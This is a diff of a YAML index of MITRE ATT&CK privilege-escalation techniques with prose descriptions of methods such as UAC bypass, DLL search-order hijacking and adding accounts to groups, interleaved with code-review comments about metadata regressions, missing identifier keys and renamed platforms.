+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15810,7 +16076,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15841,7 +16106,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -15875,13 +16140,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -15900,7 +16163,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -15914,7 +16176,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -15941,8 +16202,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -15973,12 +16234,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16050,9 +16312,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16068,12 +16330,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16148,12 +16409,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16173,9 +16433,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16195,9 +16460,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -16214,6 +16478,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16247,7 +16515,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16403,31 +16670,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16444,6 +16691,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16454,9 +16702,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16464,13 +16716,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16500,6 +16768,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16510,6 +16779,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16518,13 +16788,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
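Review bot: the platform list for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider` alongside the bump to `x_mitre_version: '2.5'`, and the same replacement appears for T1078.001 and T1548 later in this diff. Any per-platform index that filters on the old platform strings will silently lose these techniques, so the platform-to-index mapping should be updated to the new names in the same change.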
@@ -16566,9 +16836,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16636,19 +16903,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16664,8 +16930,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16679,7 +16945,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16705,6 +16971,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
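Review bot: the new `Hexacorn DLL Hijacking` entry resolves the `(Citation: Hexacorn DLL Hijacking)` that the earlier T1574.001 description hunk adds, so the citation and its reference land together, which is what we want. The unchanged context line directly below shows the `Microsoft Security Advisory 2269637` reference with an empty year in `Microsoft. (, May 23).`; that is upstream ATT&CK data rather than something this PR introduces, but it is worth reporting upstream so the next regeneration picks up a fix.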
@@ -16732,12 +17002,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16763,7 +17032,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16805,7 +17074,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -16883,11 +17151,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -16967,7 +17234,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
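Review bot: the new T1098.007 object has no `identifier: T1098.007` line between `x_mitre_modified_by_ref` and `atomic_tests: []`, whereas sibling entries in this diff carry one (`identifier: T1053.003`, `identifier: T1098.003`, `identifier: T1574.001`); if the identifier is what the index is keyed on, this entry, and the similarly identifier-less T1574.014, T1098.006, T1053 and T1548 objects, should be checked against the generator's rule for when that key is emitted. Two smaller points: `x_mitre_detection: ''` is empty, so anything rendering detection guidance for this technique will show nothing, and since `kill_chain_phases` lists `persistence` as well as `privilege-escalation`, the same object should also appear under the persistence section of the index.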
@@ -16990,7 +17327,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
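Review bot: `modified` for T1055.003 moves backwards, from 2022-04-25 to 2021-10-18, and the same regression appears below for T1546.011, T1037.002, T1055, T1547.005, T1543.004, T1546.005, T1574.006, T1134.002 and T1548.001. That pattern suggests the generator now reads each object's own `modified` timestamp instead of one stamped on the whole bundle; if so the change is correct, but anything that sorts by or filters on `modified` to find recently changed techniques should be checked, and the PR description should state that the regression is intentional.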
@@ -17038,8 +17375,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
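Review bot: T1055.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing put in their place, unlike T1053.003 above, which is re-emitted with `x_mitre_attack_spec_version: 3.2.0`. The same happens for T1546.011, T1547.005 and T1546.005 further down, so after this change those objects carry no spec version at all. Check whether the upstream objects really lack `x_mitre_attack_spec_version` or whether the generator is dropping it for objects whose previous value was 2.1.0.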
@@ -17071,7 +17406,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17126,13 +17461,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17193,9 +17526,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17204,7 +17537,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17257,7 +17589,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17278,12 +17610,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17386,7 +17717,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17486,12 +17816,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17504,7 +17833,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17517,7 +17845,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17547,7 +17874,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -17574,7 +17902,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
